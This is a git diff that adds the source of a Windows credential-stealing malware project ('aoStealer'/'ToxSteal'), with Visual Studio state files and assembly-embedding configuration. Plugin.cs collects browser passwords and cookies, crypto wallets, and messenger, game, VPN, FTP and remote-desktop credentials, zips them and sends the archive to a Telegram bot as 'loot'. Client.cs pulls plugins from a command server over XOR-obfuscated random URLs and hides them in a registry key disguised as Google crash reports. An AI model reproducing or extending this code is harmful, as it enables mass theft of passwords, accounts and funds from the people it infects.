tyler\\new\\intelix.helper.data\\counter.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.helper.data\\counter.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}" + }, + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.helper\\windowsinfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.helper\\windowsinfo.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}" + }, + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets\\itarget.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets\\itarget.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}" + }, + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets.device\\screenshot.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets.device\\screenshot.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}" + }, + { + "AbsoluteMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|c:\\users\\user\\documents\\toxsteal-standalone adan tyler\\new\\intelix.targets.crypto\\cryptodesktop.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}", + "RelativeMoniker": "D:0:0:{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}|aoStealerv35_c6.csproj|solutionrelative:intelix.targets.crypto\\cryptodesktop.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}" + } + ], + "DocumentGroupContainers": [ + { + "Orientation": 1, + "VerticalTabListWidth": 256, + "DocumentGroups": [ + { + "DockedHeight": 200, + "SelectedChildIndex": 6, + "Children": [ + { + "$type": "Document", + "DocumentIndex": 4, + "Title": "WindowsInfo.cs", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper\\WindowsInfo.cs", + "RelativeDocumentMoniker": "Intelix.Helper\\WindowsInfo.cs", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper\\WindowsInfo.cs", + "RelativeToolTip": "Intelix.Helper\\WindowsInfo.cs", + "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|", + "WhenOpened": "2025-11-14T06:24:20.246Z" + }, + { + "$type": "Document", + "DocumentIndex": 5, + "Title": "ITarget.cs", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets\\ITarget.cs", + "RelativeDocumentMoniker": "Intelix.Targets\\ITarget.cs", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets\\ITarget.cs", + "RelativeToolTip": "Intelix.Targets\\ITarget.cs", + "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|", + "WhenOpened": "2025-11-14T06:23:56.835Z" + }, + { + "$type": "Document", + "DocumentIndex": 6, + "Title": "ScreenShot.cs", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\ScreenShot.cs", + "RelativeDocumentMoniker": "Intelix.Targets.Device\\ScreenShot.cs", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\ScreenShot.cs", + "RelativeToolTip": "Intelix.Targets.Device\\ScreenShot.cs", + "ViewState": "AgIAAAAAAAAAAAAAAAAAAGkAAAATAAAAAAAAAA==", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|", + "WhenOpened": "2025-11-14T06:17:48.591Z" + }, + { + "$type": "Document", + "DocumentIndex": 7, + "Title": "CryptoDesktop.cs", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Crypto\\CryptoDesktop.cs", + "RelativeDocumentMoniker": "Intelix.Targets.Crypto\\CryptoDesktop.cs", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Crypto\\CryptoDesktop.cs", + "RelativeToolTip": "Intelix.Targets.Crypto\\CryptoDesktop.cs", + "ViewState": "AgIAACYAAAAAAAAAAAAQwAAAAAAAAAAAAAAAAA==", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|", + "WhenOpened": "2025-11-14T06:17:25.353Z" + }, + { + "$type": "Document", + "DocumentIndex": 1, + "Title": "SystemInfo.cs", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\SystemInfo.cs", + "RelativeDocumentMoniker": "Intelix.Targets.Device\\SystemInfo.cs", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Targets.Device\\SystemInfo.cs", + "RelativeToolTip": "Intelix.Targets.Device\\SystemInfo.cs", + "ViewState": "AgIAAAAAAAAAAAAAAAAAAAkBAAAGAAAAAAAAAA==", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|", + "WhenOpened": "2025-11-14T06:13:39.667Z" + }, + { + "$type": "Document", + "DocumentIndex": 2, + "Title": "aoStealerv35_c6", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\aoStealerv35_c6.csproj", + "RelativeDocumentMoniker": "aoStealerv35_c6.csproj", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\aoStealerv35_c6.csproj", + "RelativeToolTip": "aoStealerv35_c6.csproj", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000758|", + "WhenOpened": "2025-11-14T05:57:49.856Z" + }, + { + "$type": "Document", + "DocumentIndex": 0, + "Title": "Plugin.cs", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\CvMega\\Plugin.cs", + "RelativeDocumentMoniker": "CvMega\\Plugin.cs", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\CvMega\\Plugin.cs", + "RelativeToolTip": "CvMega\\Plugin.cs", + "ViewState": "AgIAAGAAAAAAAAAAAAAuwHsAAAAtAAAAAAAAAA==", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|", + "WhenOpened": "2025-11-14T05:42:53.155Z", + "EditorCaption": "" + }, + { + "$type": "Document", + "DocumentIndex": 3, + "Title": "Counter.cs", + "DocumentMoniker": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper.Data\\Counter.cs", + "RelativeDocumentMoniker": "Intelix.Helper.Data\\Counter.cs", + "ToolTip": "C:\\Users\\User\\Documents\\ToxSteal-Standalone Adan tyler\\New\\Intelix.Helper.Data\\Counter.cs", + "RelativeToolTip": "Intelix.Helper.Data\\Counter.cs", + "ViewState": "AgIAAB8AAAAAAAAAAAAiwEAAAAAoAAAAAAAAAA==", + "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|", + "WhenOpened": "2025-11-14T06:25:21.693Z" + } + ] + } + ] + } + ] +} \ No newline at end of file diff --git a/New/.vs/aoStealerv35_c6/v17/HierarchyCache.v1.txt b/New/.vs/aoStealerv35_c6/v17/HierarchyCache.v1.txt new file mode 100644 index 0000000..322e859 Binary files /dev/null and b/New/.vs/aoStealerv35_c6/v17/HierarchyCache.v1.txt differ diff --git a/New/CvMega.Helper/._Client.cs b/New/CvMega.Helper/._Client.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/CvMega.Helper/._Client.cs differ diff --git a/New/CvMega.Helper/._MutexControl.cs b/New/CvMega.Helper/._MutexControl.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/CvMega.Helper/._MutexControl.cs differ diff --git a/New/CvMega.Helper/._RandomPathGenerator.cs b/New/CvMega.Helper/._RandomPathGenerator.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/CvMega.Helper/._RandomPathGenerator.cs differ diff --git a/New/CvMega.Helper/._RegeditKey.cs b/New/CvMega.Helper/._RegeditKey.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/CvMega.Helper/._RegeditKey.cs differ diff --git a/New/CvMega.Helper/._SimpleEncryptor.cs b/New/CvMega.Helper/._SimpleEncryptor.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/CvMega.Helper/._SimpleEncryptor.cs differ diff --git a/New/CvMega.Helper/Client.cs b/New/CvMega.Helper/Client.cs new file mode 100644 index 0000000..e09b8bd --- /dev/null +++ b/New/CvMega.Helper/Client.cs @@ -0,0 +1,92 @@ +using System; +using System.Collections.Generic; +using System.Net.Http; +using System.Text; + +namespace CvMega.Helper; + +internal class Client +{ + public static string currentHost = string.Empty; + + public static byte[] GetPlugin(string name) + { + if (name == "Client") + { + return null; + } + if (RegeditKey.CheckValue("ao" + name)) + { + return SimpleEncryptor.XorEncryptMyKey(Convert.FromBase64String(RegeditKey.GetValue("ao" + name)), 66); + } + byte[] array = SendGet(new Dictionary + { + { "command", "plugin" }, + { "name", name } + }); + if (array == null) + { + return null; + } + RegeditKey.SetValue("ao" + name, Convert.ToBase64String(SimpleEncryptor.XorEncryptMyKey(array, 66))); + return array; + } + + public static byte[] GetResource(string name) + { + if (name == "Client") + { + return null; + } + if (RegeditKey.CheckValue("oa" + name)) + { + return SimpleEncryptor.XorEncryptMyKey(Convert.FromBase64String(RegeditKey.GetValue("ao" + name)), 66); + } + byte[] array = SendGet(new Dictionary + { + { "command", "resource" }, + { "name", name } + }); + if (array == null) + { + return null; + } + RegeditKey.SetValue("ao" + name, Convert.ToBase64String(SimpleEncryptor.XorEncryptMyKey(array, 66))); + return array; + } + + public static string SendGetRequest(Dictionary parameters) + { + byte[] array = SendGet(parameters); + if (array == null) + { + return null; + } + return SimpleEncryptor.Decrypt(Encoding.UTF8.GetString(array)); + } + + public static byte[] SendGet(Dictionary parameters) + { + try + { + using HttpClient httpClient = new HttpClient(); + StringBuilder stringBuilder = new StringBuilder(currentHost + RandomPathGenerator.GenerateCompletelyRandomPath()); + if (parameters.Count > 0) + { + stringBuilder.Append("?"); + foreach (KeyValuePair parameter in parameters) + { + stringBuilder.Append(SimpleEncryptor.Hash(parameter.Key) + "=" + SimpleEncryptor.Encrypt(parameter.Value) + "&"); + } + stringBuilder.Length--; + } + string requestUri = stringBuilder.ToString(); + httpClient.DefaultRequestHeaders.Add("User-Agent", "cvmega"); + return httpClient.GetAsync(requestUri).Result.Content.ReadAsByteArrayAsync().Result; + } + catch + { + return null; + } + } +} diff --git a/New/CvMega.Helper/MutexControl.cs b/New/CvMega.Helper/MutexControl.cs new file mode 100644 index 0000000..faea145 --- /dev/null +++ b/New/CvMega.Helper/MutexControl.cs @@ -0,0 +1,16 @@ +using System.Threading; + +namespace CvMega.Helper; + +public static class MutexControl +{ + public static Mutex currentApp; + + public static bool createdNew; + + public static bool CreateMutex(string mtx) + { + currentApp = new Mutex(initiallyOwned: false, mtx, out createdNew); + return createdNew; + } +} diff --git a/New/CvMega.Helper/RandomPathGenerator.cs b/New/CvMega.Helper/RandomPathGenerator.cs new file mode 100644 index 0000000..aed549f --- /dev/null +++ b/New/CvMega.Helper/RandomPathGenerator.cs @@ -0,0 +1,40 @@ +using System; +using System.Text; + +namespace CvMega.Helper; + +internal class RandomPathGenerator +{ + private static readonly Random random = new Random(); + + private static readonly string chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; + + private static readonly string[] extensions = new string[7] { "", ".txt", ".png", ".jpg", ".html", ".json", "" }; + + public static string GenerateCompletelyRandomPath() + { + int num = random.Next(1, 11); + StringBuilder stringBuilder = new StringBuilder(); + for (int i = 0; i < num; i++) + { + int length = random.Next(3, 20); + stringBuilder.Append('/'); + stringBuilder.Append(GenerateRandomString(length)); + } + if (random.Next(2) == 1) + { + stringBuilder.Append(extensions[random.Next(extensions.Length)]); + } + return stringBuilder.ToString(); + } + + private static string GenerateRandomString(int length) + { + StringBuilder stringBuilder = new StringBuilder(length); + for (int i = 0; i < length; i++) + { + stringBuilder.Append(chars[random.Next(chars.Length)]); + } + return stringBuilder.ToString(); + } +} diff --git a/New/CvMega.Helper/RegeditKey.cs b/New/CvMega.Helper/RegeditKey.cs new file mode 100644 index 0000000..f528182 --- /dev/null +++ b/New/CvMega.Helper/RegeditKey.cs @@ -0,0 +1,60 @@ +using Microsoft.Win32; + +namespace CvMega.Helper; + +internal class RegeditKey +{ + public static string Regkey = "SOFTWARE\\Google\\CrashReports"; + + public static bool CheckValue(string name) + { + using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64)) + { + using RegistryKey registryKey2 = registryKey.CreateSubKey(Regkey, writable: false); + if (registryKey2.GetValue(name) != null) + { + return true; + } + } + return false; + } + + public static void SetValue(string name, string value) + { + using RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64); + using RegistryKey registryKey2 = registryKey.CreateSubKey(Regkey, writable: true); + if (CheckValue(name)) + { + registryKey2.DeleteValue(name); + } + registryKey2.SetValue(name, value); + } + + public static string GetValue(string name) + { + if (!CheckValue(name)) + { + return null; + } + using RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64); + using RegistryKey registryKey2 = registryKey.CreateSubKey(Regkey, writable: false); + return (string)registryKey2.GetValue(name); + } + + public static string[] GetValues() + { + using RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64); + using RegistryKey registryKey2 = registryKey.CreateSubKey(Regkey, writable: false); + return registryKey2.GetValueNames(); + } + + public static void DeleteValue(string name) + { + using RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64); + using RegistryKey registryKey2 = registryKey.CreateSubKey(Regkey, writable: true); + if (CheckValue(name)) + { + registryKey2.DeleteValue(name); + } + } +} diff --git a/New/CvMega.Helper/SimpleEncryptor.cs b/New/CvMega.Helper/SimpleEncryptor.cs new file mode 100644 index 0000000..971d67c --- /dev/null +++ b/New/CvMega.Helper/SimpleEncryptor.cs @@ -0,0 +1,59 @@ +using System; +using System.Security.Cryptography; +using System.Text; +using System.Web; + +namespace CvMega.Helper; + +public class SimpleEncryptor +{ + public static readonly string secretKey = "cvls0"; + + public static string Encrypt(string data) + { + return HttpUtility.UrlEncode(Convert.ToBase64String(XorEncrypt(Encoding.UTF8.GetBytes(data)))); + } + + public static string EncryptNonEnc(string data) + { + return Convert.ToBase64String(XorEncrypt(Encoding.UTF8.GetBytes(data))); + } + + public static string Decrypt(string data) + { + return Encoding.UTF8.GetString(XorEncrypt(Convert.FromBase64String(data))); + } + + public static string Hash(string data) + { + using MD5 mD = MD5.Create(); + byte[] array = mD.ComputeHash(Encoding.UTF8.GetBytes(data)); + StringBuilder stringBuilder = new StringBuilder(); + byte[] array2 = array; + foreach (byte b in array2) + { + stringBuilder.Append(b.ToString("x2")); + } + return HttpUtility.UrlEncode(stringBuilder.ToString().Substring(0, 10)); + } + + public static byte[] XorEncryptMyKey(byte[] data, byte key) + { + byte[] array = new byte[data.Length]; + for (int i = 0; i < data.Length; i++) + { + array[i] = (byte)(data[i] ^ key); + } + return array; + } + + public static byte[] XorEncrypt(byte[] dataBytes) + { + byte[] bytes = Encoding.UTF8.GetBytes(secretKey); + for (int i = 0; i < dataBytes.Length; i++) + { + dataBytes[i] ^= bytes[i % bytes.Length]; + } + return dataBytes; + } +} diff --git a/New/CvMega/._Plugin.cs b/New/CvMega/._Plugin.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/CvMega/._Plugin.cs differ diff --git a/New/CvMega/Plugin.cs b/New/CvMega/Plugin.cs new file mode 100644 index 0000000..76c77d5 --- /dev/null +++ b/New/CvMega/Plugin.cs @@ -0,0 +1,403 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Net.Http; +using System.Net.Http.Headers; +using System.Text; +using System.Threading; +using System.Threading.Tasks; +using System.Linq; +using Intelix.Helper; +using Intelix.Helper.Data; +using Intelix.Targets; +using Intelix.Targets.Applications; +using Intelix.Targets.Browsers; +using Intelix.Targets.Crypto; +using Intelix.Targets.Device; +using Intelix.Targets.Games; +using Intelix.Targets.Messangers; +using Intelix.Targets.Vpn; + +namespace CvMega; + +public class Program +{ + public static List targetsBrowsers = new List + { + new Chromium(), + new Gecko() + }; + + public static List targets = new List + { + new ScreenShot(), + new GameList(), + new InstalledBrowsers(), + new InstalledPrograms(), + new ProcessDump(), + new ProductKey(), + new SystemInfo(), + new WifiKey(), + new Telegram(), + new Discord(), + new Element(), + new Icq(), + new MicroSIP(), + new Jabber(), + new Outlook(), + new Pidgin(), + new Signal(), + new Skype(), + new Tox(), + new Viber(), + new Minecraft(), + new BattleNet(), + new Epic(), + new Riot(), + new Roblox(), + new Steam(), + new Uplay(), + new XBox(), + new Growtopia(), + new ElectronicArts(), + new Rdp(), + new AnyDesk(), + new CyberDuck(), + new DynDns(), + new FileZilla(), + new Ngrok(), + new PlayIt(), + new TeamViewer(), + new WinSCP(), + new TotalCommander(), + new FTPNavigator(), + new FTPRush(), + new CoreFtp(), + new FTPGetter(), + new FTPCommander(), + new TeamSpeak(), + new Obs(), + new GithubGui(), + new NoIp(), + new FoxMail(), + new Navicat(), + new RDCMan(), + new Sunlogin(), + new Xmanager(), + new JetBrains(), + new PuTTY(), + new Cisco(), + new RadminVPN(), + new CyberGhost(), + new ExpressVPN(), + new HideMyName(), + new IpVanish(), + new MullVad(), + new NordVpn(), + new OpenVpn(), + new PIAVPN(), + new ProtonVpn(), + new Proxifier(), + new SurfShark(), + new Hamachi(), + new WireGuard(), + new SoftEther(), + new CryptoDesktop(), + new Grabber(), + new UserAgentGenerator(), + new CryptoChromium(), + new CryptoGecko() + }; + + public static StringBuilder stringBuilderError = new StringBuilder(); + + public static async Task Main(string[] args) + { + string botToken = "ur token"; + string chatId = "1781548144"; + string userName = Environment.UserName; + string machineName = Environment.MachineName; + string userIdentifier = $"{userName}@{machineName}"; + + string arguments = string.Join(" ", args); + + if (arguments.Contains("--run-once")) + { + string exeDirectory = AppDomain.CurrentDomain.BaseDirectory; + string path = Path.Combine(exeDirectory, "crashreport.txt"); + if (File.Exists(path)) + { + return; + } + File.Create(path); + } + + // Collect and send data + await CollectAndSendDataViaTelegram(botToken, chatId, userIdentifier); + } + + public class CollectionResult + { + public string ZipPath { get; set; } + public Counter Counter { get; set; } + } + + public static async Task CollectAndZipDataAsync() + { + string tempDir = Path.GetTempPath(); + string userName = Environment.UserName; + string machineName = Environment.MachineName; + string userIdentifier = $"{userName}@{machineName}"; + + string finalZipName = $"{userIdentifier}.zip"; + string finalZipPath = Path.Combine(tempDir, finalZipName); + + InMemoryZip zip = new InMemoryZip(); + Counter counter = new Counter(); + + try + { + try + { + Task ipTask = Task.Run(() => IpApi.GetPublicIp()); + + Task.WaitAll(Task.Run(delegate + { + Parallel.ForEach(targets, delegate (ITarget target) + { + try + { + target.Collect(zip, counter); + } + catch (Exception ex) + { + stringBuilderError.AppendLine($"[TARGET: {target.GetType().Name}] {ex.Message}"); + } + }); + }), Task.Run(delegate + { + ProcessKiller.KillerAll(); + Thread.Sleep(200); + Parallel.ForEach(targetsBrowsers, delegate (ITarget target) + { + try + { + target.Collect(zip, counter); + } + catch (Exception ex) + { + stringBuilderError.AppendLine($"[BROWSER: {target.GetType().Name}] {ex.Message}"); + } + }); + })); + + counter.Collect(zip); + + zip.AddTextFile("Error.txt", stringBuilderError.ToString()); + + // Save the zip file + byte[] zipData = zip.ToArray(); + File.WriteAllBytes(finalZipPath, zipData); + + return new CollectionResult { ZipPath = finalZipPath, Counter = counter }; + } + catch (Exception ex) + { + stringBuilderError.AppendLine($"Error during data collection: {ex.Message}"); + return new CollectionResult { ZipPath = null, Counter = counter }; + } + } + finally + { + if (zip != null) + { + ((IDisposable)zip).Dispose(); + } + } + } + + public static async Task CollectAndSendDataViaTelegram(string botToken, string chatId, string userIdentifier) + { + var result = await CollectAndZipDataAsync(); + + if (!string.IsNullOrEmpty(result.ZipPath) && File.Exists(result.ZipPath)) + { + try + { + byte[] zipData = File.ReadAllBytes(result.ZipPath); + + string userName = Environment.UserName; + string machineName = Environment.MachineName; + string userIdentifierLocal = $"{userName}@{machineName}"; + + string fileNameForArchive = userIdentifierLocal; + + string publicIp = "N/A"; + try + { + publicIp = IpApi.GetPublicIp(); + } + catch (Exception) { } + + // Calculate actual counts from the counter that was used during collection + int totalPasswords = result.Counter.Browsers.Sum(b => (int)(long)b.Password); + int totalCookies = result.Counter.Browsers.Sum(b => (int)(long)b.Cookies); + int totalWallets = result.Counter.CryptoDesktop.Count + result.Counter.CryptoChromium.Count; + int totalApplications = result.Counter.Applications.Count; + int totalGames = result.Counter.Games.Count; + int totalVpns = result.Counter.Vpns.Count; + int totalMessengers = result.Counter.Messangers.Count; + + // Create message that works for both Telegram and Discord + string caption = $"**✨ New Log Received ✨**\n\n" + + $"**💻 User:** `{userIdentifierLocal}`\n" + + $"**🌍 IP:** `{publicIp}`\n\n" + + $"**📊 Main Loot:**\n" + + $"**🔑 Passwords:** `{totalPasswords}`\n" + + $"**🍪 Cookies:** `{totalCookies}`\n" + + $"**💰 Wallets:** `{totalWallets}`\n\n" + + $"**📦 Additional Data:**\n" + + $"**📱 Applications:** `{totalApplications}`\n" + + $"**🎮 Games:** `{totalGames}`\n" + + $"**🔒 VPNs:** `{totalVpns}`\n" + + $"**💬 Messengers:** `{totalMessengers}`\n\n" + + $"**👨‍💻 Developer:** `@tcixt`"; + + // Send via Telegram (convert markdown to HTML properly) + string telegramCaption = ConvertMarkdownToHtml(caption); + + await SendToTelegram(botToken.TrimEnd('\0'), chatId.TrimEnd('\0'), zipData, fileNameForArchive, telegramCaption); + + // Clean up + try { File.Delete(result.ZipPath); } catch { } + } + catch (Exception ex) + { + // Log error but don't crash + File.AppendAllText("error.log", $"{DateTime.Now}: {ex}\n"); + } + } + } + + // Helper method to convert markdown to HTML for Telegram + private static string ConvertMarkdownToHtml(string markdown) + { + string result = markdown; + + // Convert **text** to text + while (result.Contains("**")) + { + int firstIndex = result.IndexOf("**"); + if (firstIndex >= 0) + { + int secondIndex = result.IndexOf("**", firstIndex + 2); + if (secondIndex >= 0) + { + string beforeFirst = result.Substring(0, firstIndex); + string betweenTags = result.Substring(firstIndex + 2, secondIndex - firstIndex - 2); + string afterSecond = result.Substring(secondIndex + 2); + result = beforeFirst + "" + betweenTags + "" + afterSecond; + } + else + { + break; // No closing tag found + } + } + } + + // Convert `text` to text + while (result.Contains("`")) + { + int firstIndex = result.IndexOf("`"); + if (firstIndex >= 0) + { + int secondIndex = result.IndexOf("`", firstIndex + 1); + if (secondIndex >= 0) + { + string beforeFirst = result.Substring(0, firstIndex); + string betweenTags = result.Substring(firstIndex + 1, secondIndex - firstIndex - 1); + string afterSecond = result.Substring(secondIndex + 1); + result = beforeFirst + "" + betweenTags + "" + afterSecond; + } + else + { + break; // No closing tag found + } + } + } + + return result; + } + + public static async Task SendToTelegram(string botToken, string chatId, byte[] file, string fileName, string caption) + { + if (file == null || file.Length == 0) + { + return; + } + + try + { + using HttpClient httpClient = new HttpClient(); + httpClient.DefaultRequestHeaders.UserAgent.ParseAdd("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"); + + string url = $"https://api.telegram.org/bot{botToken}/sendDocument"; + using MultipartFormDataContent multipartFormDataContent = new MultipartFormDataContent(); + + multipartFormDataContent.Add(new StringContent(chatId), "chat_id"); + multipartFormDataContent.Add(new StringContent(caption), "caption"); + multipartFormDataContent.Add(new StringContent("HTML"), "parse_mode"); + + using ByteArrayContent byteArrayContent = new ByteArrayContent(file); + byteArrayContent.Headers.ContentType = MediaTypeHeaderValue.Parse("application/zip"); + + string zipFileName = $"{fileName}.zip"; + + multipartFormDataContent.Add(byteArrayContent, "document", zipFileName); + + HttpResponseMessage response = await httpClient.PostAsync(url, multipartFormDataContent); + + if (!response.IsSuccessStatusCode) + { + string errorBody = await response.Content.ReadAsStringAsync(); + string errorMsg = $"Failed to send document. Status: {response.StatusCode}, Body: {errorBody}"; + File.AppendAllText("telegram_error.log", $"{DateTime.Now}: {errorMsg}\n"); + } + } + catch (HttpRequestException httpEx) + { + string errorMsg = $"HTTP request failed: {httpEx.Message}"; + File.AppendAllText("telegram_error.log", $"{DateTime.Now}: HttpRequestException: {httpEx}\n"); + } + catch (Exception ex) + { + string errorMsg = $"Failed to send document: {ex.Message}"; + File.AppendAllText("telegram_error.log", $"{DateTime.Now}: Exception: {ex}\n"); + } + } +} + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/New/FodyWeavers.xml b/New/FodyWeavers.xml new file mode 100644 index 0000000..a11d497 --- /dev/null +++ b/New/FodyWeavers.xml @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/New/FodyWeavers.xsd b/New/FodyWeavers.xsd new file mode 100644 index 0000000..ff119f7 --- /dev/null +++ b/New/FodyWeavers.xsd @@ -0,0 +1,141 @@ + + + + + + + + + + + + A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks + + + + + A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. + + + + + A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks + + + + + A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. + + + + + A list of unmanaged 32 bit assembly names to include, delimited with line breaks. + + + + + A list of unmanaged 64 bit assembly names to include, delimited with line breaks. + + + + + The order of preloaded assemblies, delimited with line breaks. + + + + + + This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file. + + + + + Controls if .pdbs for reference assemblies are also embedded. + + + + + Controls if runtime assemblies are also embedded. + + + + + Controls whether the runtime assemblies are embedded with their full path or only with their assembly name. + + + + + Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option. + + + + + As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off. + + + + + Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code. + + + + + Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior. + + + + + A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with | + + + + + A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |. + + + + + A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with | + + + + + A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with |. + + + + + A list of unmanaged 32 bit assembly names to include, delimited with |. + + + + + A list of unmanaged 64 bit assembly names to include, delimited with |. + + + + + The order of preloaded assemblies, delimited with |. + + + + + + + + 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed. + + + + + A comma-separated list of error codes that can be safely ignored in assembly verification. + + + + + 'false' to turn off automatic generation of the XML Schema file. + + + + + \ No newline at end of file diff --git a/New/Intelix.Helper.Data/._Counter.cs b/New/Intelix.Helper.Data/._Counter.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Data/._Counter.cs differ diff --git a/New/Intelix.Helper.Data/._InMemoryZip.cs b/New/Intelix.Helper.Data/._InMemoryZip.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Data/._InMemoryZip.cs differ diff --git a/New/Intelix.Helper.Data/._Paths.cs b/New/Intelix.Helper.Data/._Paths.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Data/._Paths.cs differ diff --git a/New/Intelix.Helper.Data/Counter.cs b/New/Intelix.Helper.Data/Counter.cs new file mode 100644 index 0000000..c9ad7a4 --- /dev/null +++ b/New/Intelix.Helper.Data/Counter.cs @@ -0,0 +1,194 @@ +using System.Collections.Concurrent; +using System.Collections.Generic; +using System.Linq; +using System.Text; +using Intelix.Helper.Encrypted; + +namespace Intelix.Helper.Data; + +public class Counter +{ + public class CounterBrowser + { + public string Profile; + + public string BrowserName; + + public ConcurrentLong Cookies = new ConcurrentLong(0); + + public ConcurrentLong Password = new ConcurrentLong(0); + + public ConcurrentLong CreditCards = new ConcurrentLong(0); + + public ConcurrentLong AutoFill = new ConcurrentLong(0); + + public ConcurrentLong RestoreToken = new ConcurrentLong(0); + + public 